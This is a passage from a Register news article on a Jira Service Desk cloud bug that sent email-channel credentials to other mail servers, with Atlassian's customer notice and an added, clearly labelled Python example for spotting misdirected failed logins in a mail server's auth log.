“The vulnerability has been present since early 2017,” Atlassian told its punters. “We first became aware of the issue on July 12, 2018 PST and took immediate action to investigate the matter, issuing a fix early on July 16, 2018 PST.”

Logger heads

While “credentials going to another server” is not something any admin wants to hear, there are a couple of things to keep in mind that mitigate the damage here.

First, it wasn’t just some random box on the internet that was getting the requests, Atlassian said. The bug only sent the credentials to other email servers. This brings up the second point: most email servers don’t log passwords used in unsuccessful login attempts. There’s little chance any of the credentials transmitted here were recorded, let alone harvested with the intent of being used by scumbags.
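Seen from the receiving side, a failed login for an account at a domain the server does not host is the signature of misdirected credentials like the ones described above. As an added example (not Atlassian’s code or anything from the advisory), a mail admin could scan their own auth log for that pattern without ever recording a password; the log lines and the Dovecot-like format are constructed for this example.

```python
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Set

# Constructed sample log in a Dovecot-like format; addresses are documentation
# ranges and the accounts are invented. Passwords never appear in such lines.
SAMPLE_LOG = """\
Aug  2 09:14:01 mx1 dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<helpdesk@example.com>, method=PLAIN, rip=198.51.100.7, lip=203.0.113.10, TLS
Aug  2 09:14:05 mx1 dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<support@other.example>, method=PLAIN, rip=192.0.2.44, lip=203.0.113.10, TLS
Aug  2 09:20:11 mx1 dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<helpdesk@third.example>, method=PLAIN, rip=192.0.2.44, lip=203.0.113.10, TLS
Aug  2 09:31:40 mx1 dovecot: imap-login: Login: user=<helpdesk@example.com>, method=PLAIN, rip=198.51.100.7, lip=203.0.113.10, TLS
"""

# Matches only failed attempts, capturing the presented account and the remote IP.
AUTH_FAIL = re.compile(r"auth failed.*?user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)")


class Finding(NamedTuple):
    user: str  # account name presented by the remote client
    rip: str   # remote IP that presented it


def misdirected_logins(log: str, local_domains: Set[str]) -> List[Finding]:
    """Failed logins whose account belongs to a domain this server does not host.

    A local user mistyping a password is routine; a client presenting credentials
    for someone else's domain means those credentials were sent to the wrong place.
    """
    findings: List[Finding] = []
    for line in log.splitlines():
        m = AUTH_FAIL.search(line)
        if not m:
            continue
        user = m.group("user")
        domain = user.rpartition("@")[2].lower()
        if domain and domain not in local_domains:
            findings.append(Finding(user, m.group("rip")))
    return findings


def by_source(findings: List[Finding]) -> Dict[str, int]:
    """Count misdirected attempts per remote IP, to spot one client spraying many accounts."""
    return dict(Counter(f.rip for f in findings))
```

A server that sees a single remote IP presenting accounts from several foreign domains is exactly the vantage point from which this kind of bug becomes visible to a third party.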

Still, Atlassian is advising customers who opted for the email feature to change the password they use for the email accounts connected to the service out of an abundance of caution. Doing so should eliminate any possible risk from the blunder, we’re told. Atlassian is also directing any customers who have concerns about their account security to contact their support desk with the reference code HOT-84313.

Below is a copy of the full email sent out today. A spokesperson for Atlassian said they’d get back to us shortly with a full statement. ®

Hello,

We have identified a security vulnerability in the functionality used by the e-mail channel feature in Jira Service Desk’s cloud version. We want to make you aware so that you can take appropriate action on your end.

Due to a bug, our mail service occasionally sent the credentials you provided in your email channel configuration to the wrong mail server in an attempt to log in. At no point were the contents of your emails (or other data used by Jira Service Desk) exposed to other customers. Although it is unusual to configure a mail server to retain login credentials and, therefore, unlikely that the credentials were exposed, we recommend that you change the password of the email account configured in the email channel feature.

The vulnerability has been present since early 2017. We first became aware of the issue on July 12, 2018 PST and took immediate action to investigate the matter, issuing a fix early on July 16, 2018 PST. We are notifying you now after investigating and confirming you may have been affected. If you have any questions please feel free to raise a support request at https://support.atlassian.com/jiraservicedesk-cloud/ referencing HOT-84313.

Sincerely,

–The Jira Service Desk Team

Thanks to Reg reader Will Wilson for tipping us off. Have you clocked any other security cockups? Let us know – anonymity guaranteed if requested.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/02/atlassian_advises_jira_password_reset/